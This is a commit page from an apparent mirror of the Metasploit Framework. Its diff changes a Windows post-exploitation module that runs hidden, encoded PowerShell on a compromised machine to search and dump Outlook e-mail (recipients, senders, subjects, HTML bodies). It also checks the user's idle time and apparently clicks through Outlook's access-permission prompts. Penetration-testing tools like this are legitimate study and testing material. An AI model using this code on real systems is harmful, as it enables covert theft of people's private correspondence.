infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add Windows post module for reading/searching Outlook e-mail #7

bug/bundler_fix
wez3 2014-12-03 18:30:22 +01:00
parent 611e8c72eb
commit 3cadcb942a
1 changed files with 16 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
modules/post/windows/gather/outlook.rb
View File

@ -4,14 +4,13 @@
## ##
require 'msf/core' require 'msf/core'
require 'iconv'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry include Msf::Post::Windows::Registry
include Msf::Post::Windows::Powershell
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" } A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gewähren für", "de_AT" => "Zugriff gewähren für" } ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -68,13 +67,11 @@ class Metasploit3 < Msf::Post
} }
List-Folder List-Folder
| |
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script) compressed_script = compress_script(psh_script)
encoded_psh = Rex::Text.encode_base64(utf16conv) cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
listBoxes_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = cmd_out.channel.read)
sleep 3 print ("#{d}")
print listBoxes_res.channel.read end
listBoxes_res.channel.close
listBoxes_res.close
currentidle = session.ui.idle_time currentidle = session.ui.idle_time
print("\n") print("\n")
print_status("System has currently been idle for #{currentidle} seconds") print_status("System has currently been idle for #{currentidle} seconds")
@ -93,26 +90,23 @@ class Metasploit3 < Msf::Post
$Namespace = $Outlook.GetNameSpace("MAPI") $Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders $account = $NameSpace.Folders
$count = 0 $count = 0
try {
foreach ($acc in $account) { foreach ($acc in $account) {
$count = $count+1 $count = $count+1
try {
$Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items $Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody $Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
}
} catch { } catch {
Write-Host "The folder does not exist in the Outlook installation. Please fill in a correct foldername." Write-Host "Folder not found in mailbox $count"
}
} }
} }
Get-Emails "#{keyword}" "#{folder}" "#{searchobject}" Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
| |
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script) compressed_script = compress_script(psh_script)
encoded_psh = Rex::Text.encode_base64(utf16conv) cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
readEmails_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = cmd_out.channel.read)
while(d = readEmails_res.channel.read)
print ("#{d}") print ("#{d}")
end end
readEmails_res.channel.close
readEmails_res.close
end end
def clickButton(atrans,acftrans) def clickButton(atrans,acftrans)